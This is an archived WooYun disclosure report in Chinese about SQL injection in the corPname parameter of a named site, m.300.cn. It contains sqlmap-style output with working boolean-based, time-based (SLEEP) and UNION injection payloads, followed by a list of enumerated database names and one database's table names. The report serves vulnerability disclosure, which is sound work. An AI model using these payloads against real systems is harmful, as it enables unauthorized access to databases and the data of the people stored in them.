乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
233
http://m.300.cn/Maps.do?corPname=&method=showFilter 参数corPname
---Parameter: corPname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: corPname=' AND 2862=2862 AND 'wtwI' LIKE 'wtwI&method=showFilter Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: corPname=' AND (SELECT * FROM (SELECT(SLEEP(5)))cAvP) AND 'Reak' LIKE 'Reak&method=showFilter Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: corPname=' UNION ALL SELECT CONCAT(0x717a7a7071,0x5377745458554d554462,0x7171707671),NULL#&method=showFilter---web application technology: JSPback-end DBMS: MySQL 5.0.12available databases [2276]:[*] BAOAN055764M[*] BAOAN193637M[*] BAOAN290207M[*] BAOAN316560M[*] BAOAN500611M[*] BAOAN551057M[*] BAOAN570697M[*] BAOAN671455M[*] BAOAN865867M[*] BAODING038855M[*] BAODING302093M[*] BAODING313472M[*] BAODING564086M[*] BAODING657127M[*] BAODING821454M[*] BAODING917245M[*] BAODING940549M[*] BEIJING003128M[*] BEIJING070573M[*] BEIJING071397M[*] BEIJING091098M[*] BEIJING094983M[*] BEIJING171263M[*] BEIJING184237M[*] BEIJING188561M[*] BEIJING210859M[*] BEIJING215094M[*] BEIJING274834M[*] BEIJING299147M[*] BEIJING303404M[*] BEIJING406118M[*] BEIJING411224M[*] BEIJING436382M[*] BEIJING470420M[*] BEIJING476950M[*] BEIJING544569M[*] BEIJING565392M[*] BEIJING583723M[*] BEIJING676322M[*] BEIJING682415M[*] BEIJING697645M[*] BEIJING717268M[*] BEIJING725912M[*] BEIJING726889M[*] BEIJING763118M[*] BEIJING782852M[*] BEIJING798417M[*] BEIJING852312M[*] BEIJING872917M[*] BEIJING974008M[*] BEIJING984295M[*] BEIJING986206M[*] CHANGCHUN044592M[*] CHANGCHUN046057M[*] CHANGCHUN057245M[*] CHANGCHUN072022M[*] CHANGCHUN121326M[*] CHANGCHUN134224M[*] CHANGCHUN141840M[*] CHANGCHUN155082M[*] CHANGCHUN286878M[*] CHANGCHUN484741M[*] CHANGCHUN557524M[*] CHANGCHUN571265M[*] CHANGCHUN581754M。。。。。。。随便打开一个Database: ZTS_ZM_KO_2014031200065[135 tables]+------------------------------+| T_ADCATEGORY || T_ADINFOS || T_BINDWEB || T_BIZREMIND || T_CATEGORYRIGHT || T_CHANNEL_INFO_COUNT || T_CLIENT_VERSION || T_COLUMNS || T_COMPANYPURCHASE || T_CRASHINFO || T_CUSTOMER || T_CUSTOMERGROUP || T_CUSTOMER_CARE || T_CUSTOMER_FOLLOWUP || T_CUSTOMER_GROWTH_STATISTICS || T_CUSTOMER_INFO_MAP || T_CUSTOMER_POINT || T_CUSTOMFORM_CATEGORY || T_CUSTOMFORM_CONTENT || T_CUSTOMFORM_DATA || T_CUSTOMFORM_RELATION || T_DELETETASK || T_DOWNLOADCATEGORY || T_DOWNLOADFILE || T_DOWNLOADFILECALL || T_EBIZ_MODULEKEYWORDS || T_EBIZ_SEOSPREAD || T_EBIZ_SUBMITINFO || T_EBIZ_USERINFO || T_FAVORITES || T_FILEINFO || T_FLASH || T_FREECALL || T_FREECALLLOG || T_HOTKEYWORD || T_IMAGE || T_IMAGECATEGORY || T_IMAGEREFER || T_INFOCATEGORY || T_INFOCONTENT || T_INFOEXTEND || T_INFORECORD || T_INFORELAFORCATE || T_INFORELATION || T_INFO_AUTHOR || T_INFO_SOURCE || T_INQUIRYDETAIL || T_INQUIRYSHEET || T_LANGUAGE || T_LINK || T_LINKCATEGORY || T_LOGININFO || T_LOGISTICS || T_MAILHISTORY || T_MAILTEMPLATE || T_MAPCARD || T_MAPGUIDEINFO || T_MAPLABELINFO || T_MARK || T_MBATTRIBUTE || T_MBATTRIBUTESORT || T_MBCATEGORY || T_MBCONTENT || T_MBEXTENDCONTENT || T_MBREVESION || T_MEMBER || T_MEMBER_INFOCATEGORY || T_MEMBER_INFOCONTENT || T_MEMBER_LEVEL_DEF || T_MENU || T_MOBILECONTENTEXTEND || T_MODULEIMGCATEGORY || T_MYADDRESSBOOK || T_NOTICE || T_ORDERS_CART || T_PADDING_MONEY || T_PAGECONTENT || T_PAGECONTENTCATEGORY || T_PAYGATEWAYINFO || T_PAYSTATUS || T_PERMISSIONS || T_PGCERTIFICATE || T_PICTURECATEGORY || T_PMBRAND || T_PMBRANDCATEGORY || T_PMCATEGORY || T_PRODUCT || T_PRODUCTAPPENDATTR || T_PRODUCTCATEGORISE || T_PRODUCTITEM || T_PRODUCTMARK || T_PRODUCTSPEC || T_PRODUCTSPECVALUE || T_PRODUCTTEMPLATES || T_PRODUCT_COLUMN || T_PRODUCT_DEFINESPECVALUE || T_PRODUCT_EXTATTRVAL || T_PRODUCT_IMGS || T_RELATEDPRODUCT || T_ROLEPERMISSIONS || T_ROLES || T_RSSCATEGORY || T_RSSINFO || T_RSSSOURCE || T_SAVEBOX || T_SITECONFIG || T_SLIDE || T_SLIDECATEGORY || T_SLIDEINFO || T_SMSCONFIG || T_SMSENTRY || T_SMSTEMPLATE || T_SMS_CONFIG || T_SMS_HISTORY || T_SMS_MASS || T_SMS_MASS_RECEIVER || T_SMS_PREPAID || T_SMS_TEMPLATE || T_SPECIFICATIONCONTENT || T_STYLEDEFINED || T_SUBSCRIPTION || T_THUMBNAIL || T_TQLOGFILE || T_TRUECALL || T_TRUECALLLOG || T_USER || T_USERPERMISSIONS || T_USERROLES || T_USERS || T_USER_PASSWORDRETRIEVE || T_VIDEO || T_VIDEOREFER || T_WECHAT_DETAIL || T_WECHAT_EVENT || T_WECHAT_KEYWORDS |+------------------------------+涉及大量信息
求 20 rank!
危害等级:高
漏洞Rank:20
确认时间:2015-05-25 10:51
正在处理
暂无